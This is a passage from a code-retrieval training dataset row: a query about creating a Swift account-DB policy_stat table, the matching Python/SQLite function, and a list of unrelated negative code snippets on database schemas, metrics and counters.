Dataset columns:
  query            string (lengths 9 – 3.4k)
  document         string (lengths 9 – 87.4k)
  metadata         dict
  negatives        list (lengths 4 – 101)
  negative_scores  list (lengths 4 – 101)
  document_score   string (lengths 3 – 10)
  document_rank    string (102 distinct values)
Copied from AccountBroker before the container_count column was added. Creates the policy_stat table, which is specific to the account DB. It is not part of Pluggable Backends; it is internal to the baseline code.
def pre_track_containers_create_policy_stat(self, conn):
    conn.executescript("""
        CREATE TABLE policy_stat (
            storage_policy_index INTEGER PRIMARY KEY,
            object_count INTEGER DEFAULT 0,
            bytes_used INTEGER DEFAULT 0
        );
        INSERT OR IGNORE INTO policy_stat (
            storage_policy_index, object_count, bytes_used
        )
        SELECT 0, object_count, bytes_used
        FROM account_stat WHERE container_count > 0;
    """)
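For context, the positive document above is a pre-migration helper of the kind used in OpenStack Swift's account-backend tests: it recreates the policy_stat table as it existed before per-policy container tracking and seeds it from account_stat. The sketch below is illustrative only and not part of the dataset row; it exercises the same script against an in-memory SQLite database, using a simplified stand-in for the real account_stat schema.

# Minimal, hypothetical sketch: run the pre-migration script against an
# in-memory SQLite DB. The account_stat table here is a simplified stand-in.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE account_stat (
        container_count INTEGER DEFAULT 0,
        object_count INTEGER DEFAULT 0,
        bytes_used INTEGER DEFAULT 0
    );
    INSERT INTO account_stat (container_count, object_count, bytes_used)
    VALUES (3, 42, 1024);
""")
conn.executescript("""
    CREATE TABLE policy_stat (
        storage_policy_index INTEGER PRIMARY KEY,
        object_count INTEGER DEFAULT 0,
        bytes_used INTEGER DEFAULT 0
    );
    INSERT OR IGNORE INTO policy_stat (
        storage_policy_index, object_count, bytes_used
    )
    SELECT 0, object_count, bytes_used
    FROM account_stat WHERE container_count > 0;
""")
print(conn.execute("SELECT * FROM policy_stat").fetchall())  # [(0, 42, 1024)]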
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pre_track_containers_create_container_table(self, conn):\n # revert to old trigger script to support one of the tests\n OLD_POLICY_STAT_TRIGGER_SCRIPT = \"\"\"\n CREATE TRIGGER container_insert_ps AFTER INSERT ON container\n BEGIN\n INSERT OR IGNORE INTO policy_stat\n (storage_policy_index, object_count, bytes_used)\n VALUES (new.storage_policy_index, 0, 0);\n UPDATE policy_stat\n SET object_count = object_count + new.object_count,\n bytes_used = bytes_used + new.bytes_used\n WHERE storage_policy_index = new.storage_policy_index;\n END;\n CREATE TRIGGER container_delete_ps AFTER DELETE ON container\n BEGIN\n UPDATE policy_stat\n SET object_count = object_count - old.object_count,\n bytes_used = bytes_used - old.bytes_used\n WHERE storage_policy_index = old.storage_policy_index;\n END;\n\n \"\"\"\n conn.executescript(\"\"\"\n CREATE TABLE container (\n ROWID INTEGER PRIMARY KEY AUTOINCREMENT,\n name TEXT,\n put_timestamp TEXT,\n delete_timestamp TEXT,\n object_count INTEGER,\n bytes_used INTEGER,\n deleted INTEGER DEFAULT 0,\n storage_policy_index INTEGER DEFAULT 0\n );\n\n CREATE INDEX ix_container_deleted_name ON\n container (deleted, name);\n\n CREATE TRIGGER container_insert AFTER INSERT ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count + (1 - new.deleted),\n object_count = object_count + new.object_count,\n bytes_used = bytes_used + new.bytes_used,\n hash = chexor(hash, new.name,\n new.put_timestamp || '-' ||\n new.delete_timestamp || '-' ||\n new.object_count || '-' || new.bytes_used);\n END;\n\n CREATE TRIGGER container_update BEFORE UPDATE ON container\n BEGIN\n SELECT RAISE(FAIL, 'UPDATE not allowed; DELETE and INSERT');\n END;\n\n\n CREATE TRIGGER container_delete AFTER DELETE ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count - (1 - old.deleted),\n object_count = object_count - old.object_count,\n bytes_used = bytes_used - old.bytes_used,\n hash = chexor(hash, old.name,\n old.put_timestamp || '-' ||\n old.delete_timestamp || '-' ||\n old.object_count || '-' || old.bytes_used);\n END;\n \"\"\" + OLD_POLICY_STAT_TRIGGER_SCRIPT)", "def premetadata_create_account_stat_table(self, conn, put_timestamp):\n conn.executescript('''\n CREATE TABLE account_stat (\n account TEXT,\n created_at TEXT,\n put_timestamp TEXT DEFAULT '0',\n delete_timestamp TEXT DEFAULT '0',\n container_count INTEGER,\n object_count INTEGER DEFAULT 0,\n bytes_used INTEGER DEFAULT 0,\n hash TEXT default '00000000000000000000000000000000',\n id TEXT,\n status TEXT DEFAULT '',\n status_changed_at TEXT DEFAULT '0'\n );\n\n INSERT INTO account_stat (container_count) VALUES (0);\n ''')\n\n conn.execute('''\n UPDATE account_stat SET account = ?, created_at = ?, id = ?,\n put_timestamp = ?\n ''', (self.account, Timestamp.now().internal, str(uuid4()),\n put_timestamp))", "def prespi_AccountBroker_initialize(self, conn, put_timestamp, **kwargs):\n if not self.account:\n raise ValueError(\n 'Attempting to create a new database with no account set')\n self.create_container_table(conn)\n self.create_account_stat_table(conn, put_timestamp)", "def parseToDb(self):\n self.cursor.execute('''DROP TABLE IF EXISTS policy''')\n self.cursor.execute('''CREATE TABLE policy\n (name text, src text, dst text, services text, action INTEGER)''')", "def prespi_create_container_table(self, conn):\n conn.executescript(\"\"\"\n CREATE TABLE container (\n ROWID INTEGER PRIMARY KEY AUTOINCREMENT,\n name TEXT,\n put_timestamp TEXT,\n delete_timestamp TEXT,\n object_count 
INTEGER,\n bytes_used INTEGER,\n deleted INTEGER DEFAULT 0\n );\n\n CREATE INDEX ix_container_deleted_name ON\n container (deleted, name);\n\n CREATE TRIGGER container_insert AFTER INSERT ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count + (1 - new.deleted),\n object_count = object_count + new.object_count,\n bytes_used = bytes_used + new.bytes_used,\n hash = chexor(hash, new.name,\n new.put_timestamp || '-' ||\n new.delete_timestamp || '-' ||\n new.object_count || '-' || new.bytes_used);\n END;\n\n CREATE TRIGGER container_update BEFORE UPDATE ON container\n BEGIN\n SELECT RAISE(FAIL, 'UPDATE not allowed; DELETE and INSERT');\n END;\n\n\n CREATE TRIGGER container_delete AFTER DELETE ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count - (1 - old.deleted),\n object_count = object_count - old.object_count,\n bytes_used = bytes_used - old.bytes_used,\n hash = chexor(hash, old.name,\n old.put_timestamp || '-' ||\n old.delete_timestamp || '-' ||\n old.object_count || '-' || old.bytes_used);\n END;\n \"\"\")", "def _create_schema(self): \n q = (\"CREATE TABLE IF NOT EXISTS \" + \\\n \"profiles (username text, body text, epoch numeric)\",)\n for x in q: self.cursor.execute(x)\n self.conn.commit()", "def _update_cardinality(self, c):\n if c.type in STRUCT:\n Log.error(\"not supported\")\n try:\n if c.table == \"meta.columns\":\n with self.meta.columns.locker:\n partitions = jx.sort([g[c.es_column] for g, _ in jx.groupby(self.meta.columns, c.es_column) if g[c.es_column] != None])\n self.meta.columns.update({\n \"set\": {\n \"partitions\": partitions,\n \"count\": len(self.meta.columns),\n \"cardinality\": len(partitions),\n \"last_updated\": Date.now()\n },\n \"where\": {\"eq\": {\"table\": c.table, \"es_column\": c.es_column}}\n })\n return\n if c.table == \"meta.tables\":\n with self.meta.columns.locker:\n partitions = jx.sort([g[c.es_column] for g, _ in jx.groupby(self.meta.tables, c.es_column) if g[c.es_column] != None])\n self.meta.columns.update({\n \"set\": {\n \"partitions\": partitions,\n \"count\": len(self.meta.tables),\n \"cardinality\": len(partitions),\n \"last_updated\": Date.now()\n },\n \"where\": {\"eq\": {\"table\": c.table, \"name\": c.name}}\n })\n return\n\n es_index = c.table.split(\".\")[0]\n result = self.default_es.post(\"/\" + es_index + \"/_search\", data={\n \"aggs\": {c.name: _counting_query(c)},\n \"size\": 0\n })\n r = result.aggregations.values()[0]\n count = result.hits.total\n cardinality = coalesce(r.value, r._nested.value, 0 if r.doc_count==0 else None)\n if cardinality == None:\n Log.error(\"logic error\")\n\n query = Data(size=0)\n if cardinality > 1000 or (count >= 30 and cardinality == count) or (count >= 1000 and cardinality / count > 0.99):\n Log.note(\"{{table}}.{{field}} has {{num}} parts\", table=c.table, field=c.es_column, num=cardinality)\n with self.meta.columns.locker:\n self.meta.columns.update({\n \"set\": {\n \"count\": count,\n \"cardinality\": cardinality,\n \"last_updated\": Date.now()\n },\n \"clear\": [\"partitions\"],\n \"where\": {\"eq\": {\"es_index\": c.es_index, \"es_column\": c.es_column}}\n })\n return\n elif c.type in _elasticsearch.ES_NUMERIC_TYPES and cardinality > 30:\n Log.note(\"{{field}} has {{num}} parts\", field=c.name, num=cardinality)\n with self.meta.columns.locker:\n self.meta.columns.update({\n \"set\": {\n \"count\": count,\n \"cardinality\": cardinality,\n \"last_updated\": Date.now()\n },\n \"clear\": [\"partitions\"],\n \"where\": {\"eq\": {\"es_index\": 
c.es_index, \"es_column\": c.es_column}}\n })\n return\n elif len(c.nested_path) != 1:\n query.aggs[literal_field(c.name)] = {\n \"nested\": {\"path\": c.nested_path[0]},\n \"aggs\": {\"_nested\": {\"terms\": {\"field\": c.es_column, \"size\": 0}}}\n }\n else:\n query.aggs[literal_field(c.name)] = {\"terms\": {\"field\": c.es_column, \"size\": 0}}\n\n result = self.default_es.post(\"/\" + es_index + \"/_search\", data=query)\n\n aggs = result.aggregations.values()[0]\n if aggs._nested:\n parts = jx.sort(aggs._nested.buckets.key)\n else:\n parts = jx.sort(aggs.buckets.key)\n\n Log.note(\"{{field}} has {{parts}}\", field=c.name, parts=parts)\n with self.meta.columns.locker:\n self.meta.columns.update({\n \"set\": {\n \"count\": count,\n \"cardinality\": cardinality,\n \"partitions\": parts,\n \"last_updated\": Date.now()\n },\n \"where\": {\"eq\": {\"es_index\": c.es_index, \"es_column\": c.es_column}}\n })\n except Exception, e:\n if \"IndexMissingException\" in e and c.table.startswith(TEST_TABLE_PREFIX):\n with self.meta.columns.locker:\n self.meta.columns.update({\n \"set\": {\n \"count\": 0,\n \"cardinality\": 0,\n \"last_updated\": Date.now()\n },\n \"clear\":[\n \"partitions\"\n ],\n \"where\": {\"eq\": {\"es_index\": c.es_index, \"es_column\": c.es_column}}\n })\n else:\n self.meta.columns.update({\n \"set\": {\n \"last_updated\": Date.now()\n },\n \"clear\": [\n \"count\",\n \"cardinality\",\n \"partitions\",\n ],\n \"where\": {\"eq\": {\"table\": c.table, \"es_column\": c.es_column}}\n })\n Log.warning(\"Could not get {{col.table}}.{{col.es_column}} info\", col=c, cause=e)", "def upgrade():\n op.add_column(\n 'share_instances',\n Column('access_rules_status', String(length=255))\n )\n\n connection = op.get_bind()\n share_instances_table = utils.load_table('share_instances', connection)\n instance_access_table = utils.load_table('share_instance_access_map',\n connection)\n\n # NOTE(u_glide): Data migrations shouldn't be performed on live clouds\n # because it will lead to unpredictable behaviour of running operations\n # like migration.\n instances_query = (\n share_instances_table.select()\n .where(share_instances_table.c.status == constants.STATUS_AVAILABLE)\n .where(share_instances_table.c.deleted == 'False')\n )\n\n for instance in connection.execute(instances_query):\n\n access_mappings_query = instance_access_table.select().where(\n instance_access_table.c.share_instance_id == instance['id']\n ).where(instance_access_table.c.deleted == 'False')\n\n status = constants.STATUS_ACTIVE\n\n for access_rule in connection.execute(access_mappings_query):\n\n if (access_rule['state'] == constants.STATUS_DELETING or\n access_rule['state'] not in priorities):\n continue\n\n if priorities[access_rule['state']] > priorities[status]:\n status = access_rule['state']\n\n # pylint: disable=no-value-for-parameter\n op.execute(\n share_instances_table.update().where(\n share_instances_table.c.id == instance['id']\n ).values({'access_rules_status': upgrade_data_mapping[status]})\n )\n\n op.drop_column('share_instance_access_map', 'state')", "def _setup_user_bookmark_count(self):\r\n test_date_1 = datetime(2013, 11, 25)\r\n stat1 = factory.make_user_bookmark_count(username=u'admin',\r\n data=20,\r\n tstamp=test_date_1)\r\n test_date_2 = datetime(2013, 11, 15)\r\n stat2 = factory.make_user_bookmark_count(username=u'admin',\r\n data=30,\r\n tstamp=test_date_2)\r\n test_date_3 = datetime(2013, 12, 28)\r\n stat3 = factory.make_user_bookmark_count(username=u'admin',\r\n data=15,\r\n 
tstamp=test_date_3)\r\n transaction.commit()\r\n return [stat1, stat2, stat3]", "def __get_metrics_adapted(self, policies):\n percent_min = 1 - policies['percent']\n percent_max = 1 + policies['percent']\n metrics = {'cpu_min':percent_min*policies['cpu'], 'cpu_max':percent_max*policies['cpu'],\n 'memory_min':percent_min*policies['ram'], 'memory_max':percent_max*policies['ram'],\n 'disk_min':percent_min*policies['disk'], 'disk_max':percent_max*policies['disk']}\n return metrics", "def _create(self):\n with self.pdq:\n c=self.pdq.cursor() \n c.execute('CREATE TABLE pdq (item blob,priority int)')\n c.execute('CREATE INDEX priority_index ON pdq (priority)')", "def _create_intermediate_new_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._blocking_conditions_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n cond_name TEXT NOT NULL,\n reason TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._mnc_mcc_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n mcc_mnc_pattern TEXT NOT NULL,\n operator_id TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._notifications_imei_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_triplets_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE 
UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n fallback_operators TEXT[]\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._pairings_imei_imsi_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY RANGE (virt_imei_shard) \"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True, fillfactor=45)\n table_names.append(tblname)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def test_update_hyperflex_cluster_storage_policy(self):\n pass", "def Attributes(self) -> PolicyStatementAttribute:", "def _add_policy(self, policy):\n self.by_name[policy.name.upper()] = policy\n self.by_index[int(policy)] = policy", "def update_policy(self):\n pass", "def initialize_policies(self, policy_collection, options):", "def t_announceDbCount(self, *_):\n try: self.current_count=self.dbh.getRowCount()\n except: self.current_count=0\n \n self.dprint(\"* ratings_count: current count(%s)\" % self.current_count)\n self.pub(\"ratings_count\", self.current_count)", "def curr_policy_time_calc(self):\n for policy in self.policy_list:\n if policy == self.current_policy:\n policy.current_policy_time += 1", "def derive_newrelic_innodb(self):\n # InnoDB Metrics\n vals = self.get_values([\"status/innodb_pages_created\", \"status/innodb_pages_read\",\n \"status/innodb_pages_written\", \"status/innodb_buffer_pool_read_requests\",\n \"status/innodb_buffer_pool_reads\", \"status/innodb_data_fsyncs\",\n \"status/innodb_os_log_fsyncs\"])\n if vals:\n created, read, written, bp_read_requests, bp_reads, data_fsync, log_fsync = vals\n self.update_metric(\"newrelic/innodb_bp_pages_created\", created)\n self.update_metric(\"newrelic/innodb_bp_pages_read\", read)\n self.update_metric(\"newrelic/innodb_bp_pages_written\", written)\n\n hit_ratio = 0.0\n if (bp_read_requests + bp_reads) > 0:\n hit_ratio = (bp_read_requests / (bp_read_requests + bp_reads)) * 100.0\n\n self.update_metric(\"newrelic/pct_innodb_buffer_pool_hit_ratio\", hit_ratio)\n self.update_metric(\"newrelic/innodb_fsyncs_data\", data_fsync)\n self.update_metric(\"newrelic/innodb_fsyncs_os_log\", log_fsync)\n\n # InnoDB Buffer Metrics\n vals = self.get_values([\"status/innodb_buffer_pool_pages_total\", \"status/innodb_buffer_pool_pages_data\",\n \"status/innodb_buffer_pool_pages_misc\", \"status/innodb_buffer_pool_pages_dirty\",\n \"status/innodb_buffer_pool_pages_free\"])\n if vals:\n pages_total, pages_data, pages_misc, pages_dirty, pages_free = vals\n unassigned = pages_total - pages_data - pages_free - pages_misc\n\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_clean\", pages_data - pages_dirty)\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_dirty\", pages_dirty)\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_misc\", pages_misc)\n self.update_metric(\"newrelic/innodb_buffer_pool_pages_free\", pages_free)\n 
self.update_metric(\"newrelic/innodb_buffer_pool_pages_unassigned\", unassigned)", "def __create_wallets_table(self):\n cmd = \"\"\" CREATE TABLE IF NOT EXISTS %s (\n %s text PRIMARY KEY,\n %s blob,\n %s blob);\"\"\" %(TABLE_WALLETS,\n COL_WALLETS_NAME,\n COL_WALLETS_PUB_KEY,\n COL_WALLETS_PVT_KEY)\n self.__dbcursor.execute(cmd)", "def test_counts(pawprint_default_tracker_db_with_table):\n\n tracker = pawprint_default_tracker_db_with_table\n\n # Add a bunch of events\n query = (\n \"\"\"\n INSERT INTO {} (timestamp, user_id, event) VALUES\n ('2016-01-01 12:30', 'alice', 'logged_in'),\n ('2016-01-01 12:40', 'bob', 'logged_in'),\n ('2016-01-01 16:00', 'charlotte', 'logged_in'),\n ('2016-01-02 00:00', 'dan', 'logged_in'),\n ('2016-01-02 00:00', 'elizabeth', 'logged_in'),\n ('2016-01-05 00:00', 'frank', 'logged_in'),\n ('2016-01-10 00:00', 'gabrielle', 'logged_in'),\n ('2016-01-20 00:00', 'hans', 'logged_in'),\n ('2016-02-01 00:00', 'iris', 'logged_in'),\n ('2016-02-01 00:00', 'james', 'logged_in'),\n ('2016-03-01 00:00', 'kelly', 'logged_in'),\n ('2016-03-01 00:00', 'laura', 'logged_in'),\n ('2016-03-01 00:00', 'mike', 'not_logged_in')\n \"\"\"\n ).format(tracker.table)\n\n pd.io.sql.execute(query, tracker.db)\n\n logins_hourly = tracker.count(event=\"logged_in\", resolution=\"hour\")\n logins_daily = tracker.count(event=\"logged_in\")\n logins_weekly = tracker.count(event=\"logged_in\", resolution=\"week\")\n logins_monthly = tracker.count(event=\"logged_in\", resolution=\"month\")\n logins_weekly_left_range = tracker.count(\n event=\"logged_in\", resolution=\"week\", start=datetime(2016, 2, 1)\n )\n logins_weekly_right_range = tracker.count(\n event=\"logged_in\", resolution=\"week\", end=datetime(2016, 2, 1)\n )\n logins_daily_full_range = tracker.count(\n event=\"logged_in\", start=datetime(2016, 1, 15), end=datetime(2016, 2, 15)\n )\n\n # Hourly\n assert len(logins_hourly) == 8\n assert np.all(logins_hourly[\"count\"].values == [2, 1, 2, 1, 1, 1, 2, 2])\n\n # Daily\n assert len(logins_daily) == 7\n assert np.all(logins_daily[\"count\"].values == [3, 2, 1, 1, 1, 2, 2])\n\n # Weekly\n assert len(logins_weekly) == 5\n assert np.all(logins_weekly[\"count\"].values == [5, 2, 1, 2, 2])\n\n # Others\n assert len(logins_monthly) == 3\n assert len(logins_weekly_left_range) == 2 # weeks start on Monday\n assert len(logins_weekly_right_range) == 4 # and not at the start / end dates provided\n assert len(logins_daily_full_range) == 2", "def test_setup_db_for_use_retention_creation(self):\n\n expected_retention = {\n 'name': 'testRetention',\n 'duration': '1h0m0s',\n 'shardGroupDuration': '1h0m0s',\n 'replicaN': 1,\n 'default': True\n }\n assert expected_retention in self.test_client.get_list_retention_policies(\n )", "def test_create_hyperflex_cluster_storage_policy(self):\n pass", "def PolicyStatement(self) -> PolicyStatement:", "def test_create_cluster_policy(self):\n pass", "def _create_intermediate_delta_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {blacklist_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname),\n blacklist_delta_tbl=sql.Identifier(self._blacklist_tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n 
table_names.append(tblname)\n\n tblname = self._notifications_lists_delta_tblname\n notifications_delta_tbl = sql.Identifier(self._notifications_lists_tblname)\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {notifications_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n notifications_delta_tbl=notifications_delta_tbl))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_delta_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_delta_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n LIKE {exceptions_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n exceptions_delta_tbl=sql.Identifier(self._exceptions_lists_tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_delta_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def get_counters(table_id):\n fields = [\"0\"]*BUCKET_NUM\n\n for pos, cntr_list in counter_bucket_dict.items():\n for counter_name in cntr_list:\n full_table_id = COUNTER_TABLE_PREFIX + table_id\n counter_data = self.db.get(self.db.COUNTERS_DB, full_table_id, counter_name)\n if counter_data is None:\n fields[pos] = STATUS_NA\n elif fields[pos] != STATUS_NA:\n fields[pos] = str(int(fields[pos]) + int(counter_data))\n\n cntr = NStats._make(fields)\n return cntr", "def test_create_namespaced_policy(self):\n pass", "def _populate_blocking_conditions_table(self, conn):\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blocking_conditions_new_tblname\n execute_values(cursor,\n sql.SQL(\"\"\"INSERT INTO {0}(cond_name, reason)\n VALUES %s\"\"\").format(sql.Identifier(tblname)).as_string(cursor),\n [(c.label, c.reason) for c in self._blocking_conditions])\n self._add_pk(conn, tblname=tblname, pk_columns=['cond_name'])\n self._analyze_helper(cursor, tblname)\n\n # Need to get table count since execute_values doesn't retain insert count\n num_records = self._get_total_record_count(conn, tblname)\n return num_records, cp.duration", "def get_cnstat(self):\n def get_counters(table_id):\n \"\"\"\n Get the counters from specific table.\n \"\"\"\n fields = [\"0\"]*BUCKET_NUM\n\n for pos, cntr_list in counter_bucket_dict.items():\n for counter_name in cntr_list:\n full_table_id = COUNTER_TABLE_PREFIX + table_id\n counter_data = self.db.get(self.db.COUNTERS_DB, full_table_id, counter_name)\n if counter_data is None:\n fields[pos] = STATUS_NA\n elif fields[pos] != STATUS_NA:\n fields[pos] = str(int(fields[pos]) + int(counter_data))\n\n cntr = NStats._make(fields)\n return cntr\n\n def get_rates(table_id):\n \"\"\"\n Get the rates from specific table.\n \"\"\"\n fields = [\"0\",\"0\",\"0\",\"0\",\"0\",\"0\"]\n for pos, name in enumerate(rates_key_list):\n full_table_id = RATES_TABLE_PREFIX + table_id\n counter_data = self.db.get(self.db.COUNTERS_DB, full_table_id, name)\n if counter_data is None:\n fields[pos] = STATUS_NA\n elif fields[pos] != STATUS_NA:\n fields[pos] = float(counter_data)\n cntr = RateStats._make(fields)\n return cntr\n\n # Get the info from database\n counter_port_name_map 
= self.db.get_all(self.db.COUNTERS_DB, COUNTERS_PORT_NAME_MAP);\n # Build a dictionary of the stats\n cnstat_dict = OrderedDict()\n cnstat_dict['time'] = datetime.datetime.now()\n ratestat_dict = OrderedDict()\n if counter_port_name_map is None:\n return cnstat_dict, ratestat_dict\n for port in natsorted(counter_port_name_map):\n port_name = port.split(\":\")[0]\n if self.multi_asic.skip_display(constants.PORT_OBJ, port_name):\n continue\n cnstat_dict[port] = get_counters(counter_port_name_map[port])\n ratestat_dict[port] = get_rates(counter_port_name_map[port])\n return cnstat_dict, ratestat_dict", "def mysql_status(self):\n stamp = int(time.time())\n\n # get data\n conn = self.object.connect()\n result = {}\n try:\n with conn.cursor() as cursor:\n for key in REQUIRED_STATUS_FIELDS:\n cursor.execute('SHOW GLOBAL STATUS LIKE \"%s\";' % key)\n row = cursor.fetchone()\n result[row[0]] = row[1]\n except Exception as e:\n exception_name = e.__class__.__name__\n context.log.debug('failed to collect MySQLd metrics due to %s' % exception_name)\n context.log.debug('additional info:', exc_info=True)\n finally:\n conn.close()\n\n # counters\n counted_vars = {}\n for metric, variable_name in METRICS['counters'].items():\n if variable_name in result:\n counted_vars[metric] = int(result[variable_name])\n\n # compound counter\n counted_vars['mysql.global.writes'] = \\\n counted_vars['mysql.global.insert'] + \\\n counted_vars['mysql.global.update'] + \\\n counted_vars['mysql.global.delete']\n\n self.aggregate_counters(counted_vars, stamp=stamp)\n\n # gauges\n tracked_gauges = {}\n for metric, variable_name in METRICS['gauges'].items():\n if variable_name in result:\n tracked_gauges[metric] = {\n self.object.definition_hash: int(result[variable_name])\n }\n\n # compound gauges\n pool_util = 0\n if ('mysql.global.innodb_buffer_pool_pages_total' in tracked_gauges and\n tracked_gauges['mysql.global.innodb_buffer_pool_pages_total'][self.object.definition_hash] > 0):\n pool_util = (\n (tracked_gauges['mysql.global.innodb_buffer_pool_pages_total'][self.object.definition_hash] -\n tracked_gauges['mysql.global.innodb_buffer_pool_pages_free'][self.object.definition_hash]) /\n tracked_gauges['mysql.global.innodb_buffer_pool_pages_total'][self.object.definition_hash] * 100\n )\n tracked_gauges['mysql.global.innodb_buffer_pool_util'] = {\n self.object.definition_hash: pool_util\n }\n\n hit_ratio = 0\n if ('mysql.global.innodb_buffer_pool_read_requests' in tracked_gauges and\n tracked_gauges['mysql.global.innodb_buffer_pool_read_requests'][self.object.definition_hash] > 0):\n hit_ratio = (\n (tracked_gauges['mysql.global.innodb_buffer_pool_read_requests'][self.object.definition_hash] /\n (tracked_gauges['mysql.global.innodb_buffer_pool_read_requests'][self.object.definition_hash] +\n tracked_gauges['mysql.global.innodb_buffer_pool_reads'][self.object.definition_hash])) * 100\n )\n\n tracked_gauges['mysql.global.innodb_buffer_pool.hit_ratio'] = {\n self.object.definition_hash: hit_ratio\n }\n\n self.aggregate_gauges(tracked_gauges, stamp=stamp)\n\n # finalize\n self.increment_counters()\n self.finalize_gauges()", "def test_update_hyperflex_ext_fc_storage_policy(self):\n pass", "def 